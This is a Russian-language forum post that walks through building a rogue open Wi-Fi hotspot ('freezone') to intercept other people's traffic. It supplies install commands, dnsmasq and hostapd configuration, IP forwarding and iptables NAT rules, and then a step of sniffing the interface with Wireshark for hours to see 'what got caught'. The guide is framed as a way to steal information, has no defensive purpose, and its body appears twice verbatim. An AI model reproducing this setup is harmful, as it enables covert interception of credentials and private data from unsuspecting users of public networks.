- Регистрация
- 17 Окт 2019
- Сообщения
- 39
- Реакции
- 1
Тема до сих пор рабочая, не давно проверял сам, и так к делу.
Многие задумывались , как же на самом деле воруют информацию с компов итд ,для начала мы
Создаем ложную wi-fi точку
В нашем случае сниффером будет выступать ноутбук.
Нам понадобится линукс дистрибутив в установленными hostapd+dnsmasq+wireshark(можно и прокси сервер, но вы запутаетесь в своих же логах), ноутбук и радио-адаптер с поддержкой 802.11
Сейчас мы с вами будем создавать точку доступа.
pacman -Sy dnsmasq hostapd wireshark
wlan0 - интерфейс радио-адаптера
eth0 - интерфейс смотрящий в интернет
192.168.0.0(wlan0) -указать ip адрес вручную
Код:
1. Настраиваем dhcp сервер
/etc/dnsmasq.conf
interface=wlan0
bind-interfaces
listen-address=192.168.0.0
dhcp-range=192.168.0.1,192.168.0.254,255.255.255.0,24h
2. Настраиваем протокол беспроводной сети
/etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=freezone
hw_mode=g
channel=9
macaddr_acl=0
3. Включаем форвард
/etc/sysctl.conf
Раскоментировать net.ipv4.ip_forward=1
Добавляем правило в iptables:
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
4. Проброс NAT:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Добавляем в автозагрузку
systemctl enable dnsmasq
systemctl enable hostapd
Перезагружаем
5. Запускаем wireshark от рута и снифим интерфейс радио-адаптера часа 2-3
Сохраняем логи и смотрим что поймало
P.S: к сожалению только под nix ))
Многие задумывались , как же на самом деле воруют информацию с компов итд ,для начала мы
Создаем ложную wi-fi точку
В нашем случае сниффером будет выступать ноутбук.
Нам понадобится линукс дистрибутив в установленными hostapd+dnsmasq+wireshark(можно и прокси сервер, но вы запутаетесь в своих же логах), ноутбук и радио-адаптер с поддержкой 802.11
Сейчас мы с вами будем создавать точку доступа.
pacman -Sy dnsmasq hostapd wireshark
wlan0 - интерфейс радио-адаптера
eth0 - интерфейс смотрящий в интернет
192.168.0.0(wlan0) -указать ip адрес вручную
Код:
1. Настраиваем dhcp сервер
/etc/dnsmasq.conf
interface=wlan0
bind-interfaces
listen-address=192.168.0.0
dhcp-range=192.168.0.1,192.168.0.254,255.255.255.0,24h
2. Настраиваем протокол беспроводной сети
/etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=freezone
hw_mode=g
channel=9
macaddr_acl=0
3. Включаем форвард
/etc/sysctl.conf
Раскоментировать net.ipv4.ip_forward=1
Добавляем правило в iptables:
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
4. Проброс NAT:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Добавляем в автозагрузку
systemctl enable dnsmasq
systemctl enable hostapd
Перезагружаем
5. Запускаем wireshark от рута и снифим интерфейс радио-адаптера часа 2-3
Сохраняем логи и смотрим что поймало
P.S: к сожалению только под nix ))